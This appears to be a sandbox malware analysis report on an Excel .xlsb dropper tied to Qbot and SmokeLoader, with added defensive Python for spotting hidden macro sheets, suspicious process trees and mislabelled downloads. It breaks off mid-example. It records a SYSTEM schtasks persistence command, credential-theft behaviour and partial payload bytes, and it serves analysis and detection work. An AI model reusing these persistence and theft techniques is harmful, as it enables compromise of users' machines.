Analysis Report Document 8402.xlsb

Overview

General Information

Sample Name: Document 8402.xlsb
Analysis ID: 298874
MD5: 3c9afdda16363bddf5a1d9fdac5ef6b0
SHA1: 759cf38816a52260efad6772d476fd0b8ab05f50
SHA256: 749e71cdc565bbcf356afd5e3c1dafdf7280968e3a63ab386f4e8dc979c925a0

Detection

Hidden Macro 4.0, Qbot, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malicious Excel 4.0 Macro
System process connects to network (likely due to code injection or exploit)
Yara detected Qbot
Yara detected SmokeLoader
Binary contains a suspicious time stamp
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect virtual machines (IN, VMware)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found evasive API chain (may stop execution after checking mutex)
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
May use the Tor software to hide its network traffic
Office process drops PE file
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Renames NTDLL to bypass HIPS
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries device information via Setup API
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
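
The headline detection is a hidden Excel 4.0 macro sheet inside a .xlsb. The first thing a responder wants is a way to confirm that on the file itself, without opening it in Excel. The following is an added example, not code from the report or from Joe Sandbox: it unzips the workbook, walks the BIFF12 record stream in xl/workbook.bin, pulls every BrtBundleSh record (one per sheet tab, carrying the hsState visibility flag and the relationship id), and resolves the id against xl/_rels/workbook.bin.rels to see whether the tab is an XLM macro sheet. Assumed from the MS-XLSB spec: record headers are 7-bit varints (type up to 2 bytes, size up to 4), BrtBundleSh is type 0x9C with the layout hsState(4) iTabID(4) strRelID strName, strings are a 4-byte character count followed by UTF-16LE, and macro sheets use the xlMacrosheet relationship type. build_sample_xlsb() is a constructed fixture, not the analysed document.

```python
"""Audit an .xlsb for hidden/veryHidden sheets and Excel 4.0 (XLM) macro
sheets by parsing xl/workbook.bin (BIFF12) and the workbook relationships.

Added example; not code from the sandbox report. Assumed layouts (MS-XLSB):
BrtBundleSh = hsState(4) iTabID(4) strRelID strName, strings are a 4-byte cch
followed by UTF-16LE; macro sheets are linked via the xlMacrosheet
relationship type. build_sample_xlsb() is a constructed fixture.
"""
import io
import struct
import zipfile
import xml.etree.ElementTree as ET

BRT_BUNDLE_SH = 0x009C                 # one record per sheet tab
HS_STATE = {0: "visible", 1: "hidden", 2: "veryHidden"}
MACROSHEET_REL = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"
WORKSHEET_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"
PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def _varint(buf, pos, max_bytes):
    """BIFF12 record type (<=2 bytes) and size (<=4 bytes): 7 bits per byte,
    a set high bit means another byte follows."""
    value = shift = 0
    for _ in range(max_bytes):
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            break
    return value, pos


def iter_records(data):
    """Yield (record_type, payload) for every record in a BIFF12 stream."""
    pos = 0
    while pos < len(data):
        rtype, pos = _varint(data, pos, 2)
        size, pos = _varint(data, pos, 4)
        yield rtype, data[pos:pos + size]
        pos += size


def _wide_string(payload, pos):
    (cch,) = struct.unpack_from("<I", payload, pos)
    pos += 4
    if cch == 0xFFFFFFFF:              # XLNullableWideString null marker
        return None, pos
    return payload[pos:pos + 2 * cch].decode("utf-16-le"), pos + 2 * cch


def parse_bundle_sh(payload):
    state, tab_id = struct.unpack_from("<II", payload, 0)
    rel_id, pos = _wide_string(payload, 8)
    name, _ = _wide_string(payload, pos)
    return {"name": name, "tab_id": tab_id, "rel_id": rel_id,
            "state": HS_STATE.get(state, "unknown(%d)" % state)}


def audit_xlsb(blob):
    """Return one dict per sheet; 'suspicious' marks a macro sheet that is not
    visible, which is how XLM droppers usually hide their formulas."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        rels = {r.get("Id"): (r.get("Type"), r.get("Target"))
                for r in ET.fromstring(zf.read("xl/_rels/workbook.bin.rels"))
                .iter(PKG_NS + "Relationship")}
        sheets = []
        for rtype, payload in iter_records(zf.read("xl/workbook.bin")):
            if rtype != BRT_BUNDLE_SH:
                continue
            sh = parse_bundle_sh(payload)
            rel_type, sh["target"] = rels.get(sh["rel_id"], (None, None))
            sh["is_macrosheet"] = rel_type == MACROSHEET_REL
            sh["suspicious"] = sh["is_macrosheet"] and sh["state"] != "visible"
            sheets.append(sh)
    return sheets


# --- constructed fixture (not the analysed sample) ---------------------------
def _record(rtype, payload):
    def enc(v):
        out = bytearray()
        while True:
            b, v = v & 0x7F, v >> 7
            out.append(b | 0x80 if v else b)
            if not v:
                return bytes(out)
    return enc(rtype) + enc(len(payload)) + payload


def _wide(s):
    return struct.pack("<I", len(s)) + s.encode("utf-16-le")


def build_sample_xlsb():
    """Minimal package with a visible worksheet and a veryHidden macro sheet.
    Only the two parts audit_xlsb() reads exist, so Excel would reject it."""
    wb = (_record(BRT_BUNDLE_SH, struct.pack("<II", 0, 1) + _wide("rId1") + _wide("Sheet1"))
          + _record(BRT_BUNDLE_SH, struct.pack("<II", 2, 2) + _wide("rId2") + _wide("Macro1")))
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="%s" Target="worksheets/sheet1.bin"/>'
            '<Relationship Id="rId2" Type="%s" Target="macrosheets/sheet1.bin"/>'
            '</Relationships>' % (WORKSHEET_REL, MACROSHEET_REL))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.bin", wb)
        zf.writestr("xl/_rels/workbook.bin.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for sh in audit_xlsb(build_sample_xlsb()):
        print(sh)
```

On a real sample, replace build_sample_xlsb() with the file contents; the macro formulas themselves live in the target part (macrosheets/sheetN.bin) and need a separate BIFF12 formula decoder, which is what olevba does when it reports obfuscated XLM.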

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6748 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • Msysprotect.exe (PID: 5108 cmdline: 'C:\Gm238uw8\Fzr3bP\Msysprotect.exe' MD5: 492C84C9ECDD639D465C3D19F391C5DA)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • A185.exe (PID: 6320 cmdline: C:\Users\user~1\AppData\Local\Temp\A185.exe MD5: F3DE8A6AEFFADA92423BE84B2B0DB00C)
        • B7AE.exe (PID: 6692 cmdline: C:\Users\user~1\AppData\Local\Temp\B7AE.exe MD5: 7D6F961863CADC88760D0ECADC8B94D7)
          • B7AE.exe (PID: 6580 cmdline: C:\Users\user~1\AppData\Local\Temp\B7AE.exe /C MD5: 7D6F961863CADC88760D0ECADC8B94D7)
          • mhgtn.exe (PID: 5868 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Ivaqk\mhgtn.exe MD5: 7D6F961863CADC88760D0ECADC8B94D7)
          • schtasks.exe (PID: 5932 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn lrupplc /tr '\'C:\Users\user~1\AppData\Local\Temp\B7AE.exe\' /I lrupplc' /SC ONCE /Z /ST 19:54 /ET 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • explorer.exe (PID: 6628 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 1300 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 6772 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 4072 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 6760 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 4312 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 5224 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • bijvfaa (PID: 1292 cmdline: C:\Users\user\AppData\Roaming\bijvfaa MD5: 492C84C9ECDD639D465C3D19F391C5DA)
  • dmxhr.exe (PID: 2804 cmdline: C:\ProgramData\uohr\dmxhr.exe start MD5: F3DE8A6AEFFADA92423BE84B2B0DB00C)
  • cleanup
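
The process tree above already contains most of the story: Excel starts a binary from a random-looking directory, that binary starts explorer.exe (the injection target), explorer.exe starts the stage-two payloads from %TEMP%, one of them registers a SYSTEM scheduled task pointing back into %TEMP%, and the same MD5 keeps reappearing under new file names. The following is an added example, not code from the report: it parses a subset of the Startup lines (copied from the page; depth is the indentation) into a parent/child tree and applies a handful of analyst rules. The rule names and thresholds are this example's own.

```python
"""Flag suspicious parent/child relationships in a sandbox process tree.

Added example, not part of the report. It parses the report's own Startup
bullet lines (a subset is embedded below, copied from the page) and applies
analyst rules: an Office process starting an executable outside Program
Files/Windows, explorer.exe started by an untrusted parent, schtasks
registering a SYSTEM task whose action lives in a user-writable directory,
an extensionless image in a user directory, and one MD5 running under
several file names. Rule names are this example's own.
"""
import re
from collections import defaultdict

SAMPLE_TREE = r"""
  • System is w10x64
  • EXCEL.EXE (PID: 6748 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • Msysprotect.exe (PID: 5108 cmdline: 'C:\Gm238uw8\Fzr3bP\Msysprotect.exe' MD5: 492C84C9ECDD639D465C3D19F391C5DA)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • A185.exe (PID: 6320 cmdline: C:\Users\user~1\AppData\Local\Temp\A185.exe MD5: F3DE8A6AEFFADA92423BE84B2B0DB00C)
        • B7AE.exe (PID: 6692 cmdline: C:\Users\user~1\AppData\Local\Temp\B7AE.exe MD5: 7D6F961863CADC88760D0ECADC8B94D7)
          • mhgtn.exe (PID: 5868 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Ivaqk\mhgtn.exe MD5: 7D6F961863CADC88760D0ECADC8B94D7)
          • schtasks.exe (PID: 5932 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn lrupplc /tr '\'C:\Users\user~1\AppData\Local\Temp\B7AE.exe\' /I lrupplc' /SC ONCE /Z /ST 19:54 /ET 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
  • bijvfaa (PID: 1292 cmdline: C:\Users\user\AppData\Roaming\bijvfaa MD5: 492C84C9ECDD639D465C3D19F391C5DA)
  • dmxhr.exe (PID: 2804 cmdline: C:\ProgramData\uohr\dmxhr.exe start MD5: F3DE8A6AEFFADA92423BE84B2B0DB00C)
"""

LINE_RE = re.compile(r"^(?P<indent>\s*)• (?P<name>\S+) \(PID: (?P<pid>\d+) "
                     r"cmdline: ?(?P<cmd>.*?) ?MD5: (?P<md5>[0-9A-F]{32})\)$")
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\")
SYSTEM_RU = re.compile(r"/ru\s+'?nt authority\\system")   # applied to lower-cased cmdline


def image_path(cmd):
    """First token of the command line, with surrounding quotes stripped."""
    if cmd.startswith("'"):
        return cmd[1:cmd.find("'", 1)]
    return cmd.split(" ", 1)[0]


def trusted_dir(path):
    p = path.lower()
    return p.startswith("c:\\windows\\") or p.startswith("c:\\program files")


def user_writable(path):
    p = path.lower()
    return any(m in p for m in USER_WRITABLE)


def parse_tree(text):
    """Build process dicts; the parent is the nearest shallower line above."""
    procs, stack = [], []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                          # e.g. the "System is ..." line
        depth = len(m["indent"]) // 2
        proc = {"name": m["name"], "pid": int(m["pid"]), "cmd": m["cmd"],
                "md5": m["md5"], "image": image_path(m["cmd"]), "parent": None}
        while stack and stack[-1][0] >= depth:
            stack.pop()
        if stack:
            proc["parent"] = stack[-1][1]
        stack.append((depth, proc))
        procs.append(proc)
    return procs


def analyze(text):
    """Return (rule, pid, detail) tuples for every rule hit."""
    findings = []
    for p in parse_tree(text):
        parent, name, cmd = p["parent"], p["name"].lower(), p["cmd"].lower()
        if parent and parent["name"].lower() in OFFICE and not trusted_dir(p["image"]):
            findings.append(("office_spawned_untrusted_child", p["pid"], p["image"]))
        if (name == "explorer.exe" and parent and parent["name"].lower() != "explorer.exe"
                and not trusted_dir(parent["image"])):
            findings.append(("explorer_started_by_untrusted_parent", p["pid"], parent["image"]))
        if name == "schtasks.exe" and "/create" in cmd and SYSTEM_RU.search(cmd) and user_writable(cmd):
            findings.append(("schtasks_system_task_runs_from_user_dir", p["pid"], p["cmd"]))
        if "." not in p["name"] and user_writable(p["image"]):
            findings.append(("extensionless_image_in_user_dir", p["pid"], p["image"]))
    return findings


def md5_aliases(procs):
    """MD5 -> sorted file names, for hashes seen under more than one name
    (a dropped copy renamed for persistence keeps the same hash)."""
    names = defaultdict(set)
    for p in procs:
        names[p["md5"]].add(p["name"])
    return {h: sorted(n) for h, n in names.items() if len(n) > 1}


if __name__ == "__main__":
    for f in analyze(SAMPLE_TREE):
        print(*f)
    for h, names in md5_aliases(parse_tree(SAMPLE_TREE)).items():
        print(h, "->", ", ".join(names))
```

The md5_aliases() output is the quickest way to see that bijvfaa is Msysprotect.exe copied to Roaming, mhgtn.exe is B7AE.exe, and dmxhr.exe is A185.exe: three dropped stages, each persisted once under a new name.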

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000013.00000002.395141332.0000000000400000.00000040.00020000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
00000018.00000003.411696862.0000000002411000.00000004.00000001.sdmp | JoeSecurity_Qbot | Yara detected Qbot | Joe Security |
00000018.00000002.426577648.0000000002190000.00000040.00000001.sdmp | JoeSecurity_Qbot | Yara detected Qbot | Joe Security |
00000025.00000002.444336139.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Qbot | Yara detected Qbot | Joe Security |
00000013.00000003.382516594.0000000000A30000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
(10 entries in total; 5 shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
37.2.mhgtn.exe.400000.0.raw.unpack | JoeSecurity_Qbot | Yara detected Qbot | Joe Security |
24.2.B7AE.exe.21d0000.1.raw.unpack | JoeSecurity_Qbot | Yara detected Qbot | Joe Security |
4.2.Msysprotect.exe.400000.0.raw.unpack | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
19.3.bijvfaa.a30000.0.raw.unpack | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
4.2.Msysprotect.exe.400000.0.unpack | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
(13 entries in total; 5 shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Ivaqk\mhgtn.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\B7AE.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Machine Learning detection for dropped file
Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\bijvfaa; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\15[1].gif; Joe Sandbox ML: detected
Source: C:\ProgramData\uohr\dmxhr.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Ivaqk\mhgtn.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A185.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B7AE.exe; Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file
Source: 18.2.A185.exe.400000.0.unpack; Avira: Label: TR/Crypt.XPACK.Gen2
Source: 24.2.B7AE.exe.21d0000.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 27.2.B7AE.exe.2200000.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 37.2.mhgtn.exe.2200000.1.unpack; Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\AppData\Local\Temp\A185.exe; Code function: 18_2_00404609 VirtualAlloc,DecryptMessage, 18_2_00404609
Source: C:\Users\user\AppData\Local\Temp\A185.exe; Code function: 18_2_004044D4 SetUnhandledExceptionFilter,QueryContextAttributesA,VirtualAlloc,EncryptMessage, 18_2_004044D4
Source: C:\Users\user\AppData\Local\Temp\A185.exe; Code function: 18_2_00403E80 CryptImportKey,CryptExportKey,CryptDestroyKey, 18_2_00403E80
Source: C:\Users\user\AppData\Local\Temp\A185.exe; Code function: 18_2_00403BA6 CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject, 18_2_00403BA6
Source: C:\Users\user\AppData\Local\Temp\A185.exe; Code function: 18_2_004040B5 CryptStringToBinaryA,CryptStringToBinaryA, 18_2_004040B5
Source: C:\Users\user\AppData\Local\Temp\A185.exe; Code function: 18_2_004011B8 CryptAcquireContextA,CryptStringToBinaryA,CryptStringToBinaryA,inet_addr,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,CryptStringToBinaryA,CryptStringToBinaryA,wsprintfA,select,select,inet_addr,CryptReleaseContext, 18_2_004011B8
Source: C:\Users\user\AppData\Local\Temp\A185.exe; Code function: 18_2_00401DBD CryptReleaseContext, 18_2_00401DBD
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C73171 StrRChrIW,StrRChrIW,StrRChrIW,StrRChrIW,RtlCompareMemory,CryptUnprotectData, 25_2_00C73171
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C73364 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW, 25_2_00C73364
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C73696 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW, 25_2_00C73696
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C711E6 CryptBinaryToStringA,CryptBinaryToStringA, 25_2_00C711E6
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C7213A CryptUnprotectData,RtlMoveMemory, 25_2_00C7213A
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C71289 StrRChrIW,lstrlen,CryptStringToBinaryA,CryptStringToBinaryA, 25_2_00C71289
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C7122F lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW, 25_2_00C7122F
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 29_2_009E26AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA, 29_2_009E26AC

Source: C:\Users\user\AppData\Local\Temp\A185.exe; Code function: -----BEGIN RSA PUBLIC KEY----- 18_2_004040B5
Source: A185.exe; Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C71EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,FindNextFileW,FindClose, 25_2_00C71EBA
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 25_2_00C72C81 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 25_2_00C72C81
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 29_2_009E255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose, 29_2_009E255C

Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Gm238uw8\Fzr3bP\Msysprotect.exe
Source: excel.exe; Memory has grown: Private usage: 1MB later: 78MB

Networking:

Downloads files with wrong headers with respect to MIME Content-Type
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Thu, 15 Oct 2020 17:51:12 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Thu, 15 Oct 2020 09:34:15 GMT ETag: "32032e2-22200-5b1b259f3d3c0" Accept-Ranges: bytes Content-Length: 139776 Keep-Alive: timeout=5 Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a 6a aa 6e 3e 0b c4 3d 3e 0b c4 3d 3e 0b c4 3d 20 59 51 3d 24 0b c4 3d 20 59 40 3d 15 0b c4 3d 20 59 47 3d 57 0b c4 3d 19 cd bf 3d 3b 0b c4 3d 3e 0b c5 3d b8 0b c4 3d 20 59 4e 3d 3f 0b c4 3d 20 59 56 3d 3f 0b c4 3d 20 59 50 3d 3f 0b c4 3d 20 59 55 3d 3f 0b c4 3d 52 69 63 68 3e 0b c4 3d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 45 e5 fc 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 74 01 00 00 a0 4a 00 00 00 00 00 ac 2b 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 ea cb 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 de 01 00 47 00 00 00 78 d3 01 00 3c 00 00 00 00 b0 4b 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 42 73 01 00 00 10 00 00 00 74 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d7 4e 00 00 00 90 01 00 00 50 00 00 00 78 01 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 cf 49 00 00 e0 01 00 00 16 00 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 43 00 00 00 b0 4b 00 00 44 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
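
The response above declares Content-Type: image/gif and delivers a body that starts with 4d 5a ("MZ") and the "This program cannot be run in DOS mode" stub, i.e. a PE file served as an image (the same trick that lands it in the IE cache as 15[1].gif). The following is an added example, not code from the report: it parses a raw HTTP response, sniffs the body's magic bytes against the declared media type, and, when the body is a PE, follows e_lfanew to the COFF header to recover the machine type, section count and link timestamp. SAMPLE_RESPONSE is constructed from the captured headers and leading bytes; to keep it short, the DOS stub and Rich header between the DOS header and the PE signature at offset 0xE8 are replaced by zero padding, which the parser never reads. The ACCEPTS table is this example's own choice of which sniffed kinds are acceptable for which declared types.

```python
"""Content-Type vs magic-byte check for downloaded bodies, plus a minimal PE
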